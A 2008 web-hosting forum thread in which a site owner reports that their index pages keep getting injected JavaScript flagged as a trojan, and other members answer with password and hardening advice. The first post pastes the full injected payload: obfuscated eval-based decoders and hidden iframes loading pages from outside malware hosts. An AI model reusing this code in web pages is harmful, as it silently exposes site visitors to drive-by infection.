The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Why my index files on the server be infected with JS/Kryptik.B (Troyano)

Discussion in 'General Discussion' started by PC-Drivers, Nov 29, 2008.

  1. PC-Drivers

    PC-Drivers Member

    Joined:
    Aug 1, 2004
    Messages:
    7
    Likes Received:
    0
    Trophy Points:
    1
    When i upload an index file (index.htm / index.html / index.php) #index.ext#
    Automaticaly, on the server about in three days, i view on the file that the file have an javascript code with a trojan

    Example:

    Code:
    <script language="JavaScript">var wJjZIf={ou:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",i11Ojos:function(WlsrpEG){var gruMqF0vy="",qsHiSfFA5UD0C0,Ook8UnFsAzpv8,uQqDFZKnr,kXMqka9Zkc,pICrUeduf35SE,SZrTnjYXQuk7U,A6skYhraPC4rx,jtskEvcG=0;WlsrpEG=WlsrpEG.replace(/[^A-Za-z0-9\+\/\=]/g,"");while(jtskEvcG<WlsrpEG.length){kXMqka9Zkc=this.ou.indexOf(WlsrpEG.charAt(jtskEvcG++));pICrUeduf35SE=this.ou.indexOf(WlsrpEG.charAt(jtskEvcG++));SZrTnjYXQuk7U=this.ou.indexOf(WlsrpEG.charAt(jtskEvcG++));A6skYhraPC4rx=this.ou.indexOf(WlsrpEG.charAt(jtskEvcG++));qsHiSfFA5UD0C0=(kXMqka9Zkc<<2)|(pICrUeduf35SE>>4);Ook8UnFsAzpv8=((pICrUeduf35SE&15)<<4)|(SZrTnjYXQuk7U>>2);uQqDFZKnr=((SZrTnjYXQuk7U&3)<<6)|A6skYhraPC4rx;gruMqF0vy+=this.NTdhIMHe1Sd(qsHiSfFA5UD0C0);if(SZrTnjYXQuk7U!=64){gruMqF0vy+=this.NTdhIMHe1Sd(Ook8UnFsAzpv8);}if(A6skYhraPC4rx!=64){gruMqF0vy+=this.NTdhIMHe1Sd(uQqDFZKnr);}}return(wJjZIf.UXu6uINfsK(gruMqF0vy));},UXu6uINfsK:function(X8){var slflkY2R="",kllYRVG2Z2U=bfCRqsX=cfMYGqAqE2=yf0nHdCYyIROAktg=0;while(kllYRVG2Z2U<X8.length){bfCRqsX=X8.charCodeAt(kllYRVG2Z2U);if(bfCRqsX<128){slflkY2R+=this.NTdhIMHe1Sd(bfCRqsX);kllYRVG2Z2U++;}else if((bfCRqsX>191)&&(bfCRqsX<224)){yf0nHdCYyIROAktg=X8.charCodeAt(kllYRVG2Z2U+1);slflkY2R+=this.NTdhIMHe1Sd(((bfCRqsX&31)<<6)|(yf0nHdCYyIROAktg&63));kllYRVG2Z2U+=2;}else{yf0nHdCYyIROAktg=X8.charCodeAt(kllYRVG2Z2U+1);cfMYGqAqE2=X8.charCodeAt(kllYRVG2Z2U+2);slflkY2R+=this.NTdhIMHe1Sd(((bfCRqsX&15)<<12)|((yf0nHdCYyIROAktg&63)<<6)|(cfMYGqAqE2&63));kllYRVG2Z2U+=3;}}return(slflkY2R);},WAa:function(IwLaGn7P0Ft){eval(IwLaGn7P0Ft);},NTdhIMHe1Sd:function(zMNTzJcZik3Mcv){return(String.fromCharCode(zMNTzJcZik3Mcv));}}
    wJjZIf.WAa(wJjZIf.i11Ojos('ZG9jdW1lbnQud3JpdGUoJzxpZnJhbWUgd2lkdGg9MCBoZWlnaHQ9MCBzcmM9Imh0dHA6Ly9hOXJoaXdhLmNuL3VwZGF0ZV9maWxlcy91cGRhdGUucGhwIj48L2lmcmFtZT4nKQ=='))</script><script>function vyndztmmJ(jbgUBWzfP){return String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"](jbgUBWzfP);}function BESgJKf(haMTJkKrmh){var E7S99BkTF8K=0,GojhCcX=haMTJkKrmh.length,Ybfgst9ZD=1024,TF5pbY0,Z10aeROO0b2gj,bPAAJJj="",uzmroOPykIzt=E7S99BkTF8K,BLH3Ut5AcYS=E7S99BkTF8K,FcK4MrqLdhA2=E7S99BkTF8K,omP9gI=Array(63,61,41,4,23,21,18,1,40,29,0,0,0,0,0,0,50,54,51,17,49,36,43,59,6,37,9,10,11,22,13,47,62,19,14,8,35,44,28,48,57,3,32,0,0,0,0,20,0,5,56,31,30,34,16,52,15,58,33,60,45,53,38,27,25,26,24,2,42,46,7,12,55,39,0);for(Z10aeROO0b2gj=Math.ceil(GojhCcX/Ybfgst9ZD);Z10aeROO0b2gj>E7S99BkTF8K;Z10aeROO0b2gj--){for(TF5pbY0=Math.min(GojhCcX,Ybfgst9ZD);TF5pbY0>E7S99BkTF8K;TF5pbY0--,GojhCcX--){FcK4MrqLdhA2|=(omP9gI[haMTJkKrmh.charCodeAt(uzmroOPykIzt++)-48])<<BLH3Ut5AcYS;if(BLH3Ut5AcYS){bPAAJJj+=vyndztmmJ(55^FcK4MrqLdhA2&255);FcK4MrqLdhA2>>=8;BLH3Ut5AcYS-=2;}else{BLH3Ut5AcYS=6;}}}return (bPAAJJj);}var uapVT="igThQja5s2I_pN_Hz5E4YJmvfUZ4C5E5qJmazXm_Y1IsvVD46Xa_cNEsvV7CaCIscNgfvmzHr_gzq9E5pf5Mr3aMaJEMrb5MQJmQpVg4v9j4Q2zCQ7aCQaa_JraCdjm_95Wsrb5_apIM6Iz3dWZR1bY";eval(BESgJKf(uapVT));</script><script>function vyndztmmJ(jbgUBWzfP){return String["\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"](jbgUBWzfP);}function BESgJKf(haMTJkKrmh){var E7S99BkTF8K=0,GojhCcX=haMTJkKrmh.length,Ybfgst9ZD=1024,TF5pbY0,Z10aeROO0b2gj,bPAAJJj="",uzmroOPykIzt=E7S99BkTF8K,BLH3Ut5AcYS=E7S99BkTF8K,FcK4MrqLdhA2=E7S99BkTF8K,omP9gI=Array(63,61,41,4,23,21,18,1,40,29,0,0,0,0,0,0,50,54,51,17,49,36,43,59,6,37,9,10,11,22,13,47,62,19,14,8,35,44,28,48,57,3,32,0,0,0,0,20,0,5,56,31,30,34,16,52,15,58,33,60,45,53,38,27,25,26,24,2,42,46,7,12,55,39,0);for(Z10aeROO0b2gj=Math.ceil(GojhCcX/Ybfgst9ZD);Z10aeROO0b2gj>E7S99BkTF8K;Z10aeROO0b2gj--){for(TF5pbY0=Math.min(GojhCcX,Ybfgst9ZD);TF5pbY0>E7S99BkTF8K;TF5pbY0--,GojhCcX--){FcK4MrqLdhA2|=(omP9gI[haMTJkKrmh.charCodeAt(uzmroOPykIzt++)-48])<<BLH3Ut5AcYS;if(BLH3Ut5AcYS){bPAAJJj+=vyndztmmJ(55^FcK4MrqLdhA2&255);FcK4MrqLdhA2>>=8;BLH3Ut5AcYS-=2;}else{BLH3Ut5AcYS=6;}}}return (bPAAJJj);}var uapVT="igThQja5s2I_pN_Hz5E4YJmvfUZ4C5E5qJmazXm_Y1IsvVD46Xa_cNEsvV7CaCIscNgfvmzHr_gzq9E5pf5Mr3aMaJEMrb5MQJmQpVg4v9j4Q2zCQ7aCQaa_JraCdjm_95Wsrb5_apIM6Iz3dWZR1bY";eval(BESgJKf(uapVT));</script><iframe src="http://avwav.com/3341.htm" style="display:none"></iframe><script>function ly17Cd8(LmhPynqL){return String["from"+"Char"+"Code"](LmhPynqL);}function K3EEJ(cQfqZhQL){var YP2gJ8QfVEO=0,UmN6bSRQYkZm=cQfqZhQL.length,I8Bl0Q1TcJtI=1024,KzapXMbvS,xtcwdCi3,dEjzekSH4MZDq="",Qf7BG3dTPW7LA=YP2gJ8QfVEO,ADGuR=YP2gJ8QfVEO,h7kMNnix2ZWqE=YP2gJ8QfVEO,EVgfz=Array(63,21,28,38,30,49,53,58,19,29,0,0,0,0,0,0,26,62,47,42,43,48,40,54,44,11,1,18,3,6,41,8,59,55,9,0,31,56,33,60,39,52,17,0,0,0,0,16,0,61,34,7,24,5,25,2,22,45,27,20,12,14,57,32,4,51,13,37,50,23,15,10,36,35,46);for(xtcwdCi3=Math.ceil(UmN6bSRQYkZm/I8Bl0Q1TcJtI);xtcwdCi3>YP2gJ8QfVEO;xtcwdCi3--){for(eval("KzapXMbvS=Ma"+"th.m"+"in(UmN6bSRQYkZm,I8Bl0Q1TcJtI)");KzapXMbvS>YP2gJ8QfVEO;KzapXMbvS--,UmN6bSRQYkZm--){h7kMNnix2ZWqE|=(EVgfz[cQfqZhQL.charCodeAt(Qf7BG3dTPW7LA++)-48])<<ADGuR;if(ADGuR){dEjzekSH4MZDq+=ly17Cd8(202^h7kMNnix2ZWqE&255);h7kMNnix2ZWqE>>=8;ADGuR-=2;}else{ADGuR=6;}}}return (dEjzekSH4MZDq);}var e6RMPV="cLWEzh@C047Dx7InabPFAACUij0FHbPCXAC7amCDAw7a7DzFBm@Db7Pa7D4zU37ab7DB7gTnsyD0XCPCxXwNsq@NUAPNsvwNzACHxDDF7CAFz4TzzG@zzt@DYB@zyhCDobBasvwDUz7NBKTPyc05Svl";eval(K3EEJ(e6RMPV));</script><script>function ly17Cd8(LmhPynqL){return String["from"+"Char"+"Code"](LmhPynqL);}function K3EEJ(cQfqZhQL){var YP2gJ8QfVEO=0,UmN6bSRQYkZm=cQfqZhQL.length,I8Bl0Q1TcJtI=1024,KzapXMbvS,xtcwdCi3,dEjzekSH4MZDq="",Qf7BG3dTPW7LA=YP2gJ8QfVEO,ADGuR=YP2gJ8QfVEO,h7kMNnix2ZWqE=YP2gJ8QfVEO,EVgfz=Array(63,21,28,38,30,49,53,58,19,29,0,0,0,0,0,0,26,62,47,42,43,48,40,54,44,11,1,18,3,6,41,8,59,55,9,0,31,56,33,60,39,52,17,0,0,0,0,16,0,61,34,7,24,5,25,2,22,45,27,20,12,14,57,32,4,51,13,37,50,23,15,10,36,35,46);for(xtcwdCi3=Math.ceil(UmN6bSRQYkZm/I8Bl0Q1TcJtI);xtcwdCi3>YP2gJ8QfVEO;xtcwdCi3--){for(eval("KzapXMbvS=Ma"+"th.m"+"in(UmN6bSRQYkZm,I8Bl0Q1TcJtI)");KzapXMbvS>YP2gJ8QfVEO;KzapXMbvS--,UmN6bSRQYkZm--){h7kMNnix2ZWqE|=(EVgfz[cQfqZhQL.charCodeAt(Qf7BG3dTPW7LA++)-48])<<ADGuR;if(ADGuR){dEjzekSH4MZDq+=ly17Cd8(202^h7kMNnix2ZWqE&255);h7kMNnix2ZWqE>>=8;ADGuR-=2;}else{ADGuR=6;}}}return (dEjzekSH4MZDq);}var e6RMPV="cLWEzh@C047Dx7InabPFAACUij0FHbPCXAC7amCDAw7a7DzFBm@Db7Pa7D4zU37ab7DB7gTnsyD0XCPCxXwNsq@NUAPNsvwNzACHxDDF7CAFz4TzzG@zzt@DYB@zyhCDobBasvwDUz7NBKTPyc05Svl";eval(K3EEJ(e6RMPV));</script>
    
     
  2. sirotex

    sirotex Well-Known Member

    Joined:
    Jul 10, 2008
    Messages:
    121
    Likes Received:
    0
    Trophy Points:
    16
    Um...then someone is updating your files not 'automated'. Just remove & change all your passwords.
     
  3. apscinsspl

    apscinsspl Well-Known Member

    Joined:
    Mar 15, 2008
    Messages:
    112
    Likes Received:
    0
    Trophy Points:
    16
    Looks like your system is infected and your root password leaked , change the server's password as a priority and then remove all index files , reload them and change all cpanel password since FTP may also have been cracked.
     
  4. AndyReed

    AndyReed Well-Known Member
    PartnerNOC

    Joined:
    May 29, 2004
    Messages:
    2,222
    Likes Received:
    3
    Trophy Points:
    38
    Location:
    Minneapolis, MN
    If you don't secure and harden your server, hackers will continue infecting your files with JS codes. Search the cPanel forum for information on how to secure and harden your server.
     
  5. thewebhosting

    thewebhosting Well-Known Member

    Joined:
    May 9, 2008
    Messages:
    1,201
    Likes Received:
    1
    Trophy Points:
    38
    Please regularly update the password of your CPanel and FTP accounts. Make sure you choose a strong password which contains special characters.

    Also, keep a practice to see the latest available version of any third party installed software in your domain.
     
Loading...

Share This Page